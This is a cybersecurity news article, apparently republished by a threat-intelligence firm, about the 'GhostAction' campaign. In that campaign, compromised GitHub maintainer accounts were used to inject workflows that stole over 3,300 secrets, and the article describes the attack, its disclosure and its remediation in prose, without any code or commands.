Cyber researchers have uncovered a large-scale software supply chain attack on GitHub dubbed “GhostAction”, which has exposed more than 3,300 secrets, including PyPI, npm, DockerHub, GitHub tokens, Cloudflare API keys, AWS access keys, and database credentials so far.
The campaign came to light after suspicious activity was detected in the FastUUID project on September 2. Attackers had compromised maintainer accounts and injected a malicious GitHub Actions workflow designed to trigger on code pushes or manual dispatch.[1]
Once activated, the workflow harvested secrets from the environment and exfiltrated them via a curl POST request to an attacker-controlled server. In FastUUID’s case, its PyPI token was stolen, though no malicious package uploads were made prior to the breach being contained.
Malicious workflow run (Source: GitGuardian)
Further investigation revealed that the incident was far more widespread than just FastUUID. At least 817 repositories were found to contain similar malicious commits, all sending stolen secrets to the same endpoint. To maximize the theft, attackers enumerated secret names from legitimate workflows, then hardcoded them into their own scripts.
By 5 September, researchers had notified GitHub, npm, and PyPI, while also filing issues across 573 impacted repositories. One hundred projects, at this point, had already detected and reverted the malicious commits. Soon after disclosure, the exfiltration endpoint was taken offline, but not before significant damage occurred.
The exposure affects at least nine npm and 15 PyPI packages, leaving open the possibility of malicious releases unless maintainers revoke compromised tokens. While the campaign shares similarities with the AI-powered ‘s1ngularity’ attack on over 2100 GitHub accounts from August, researchers believe GhostAction is altogether a separate operation.
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-37-6/
Comments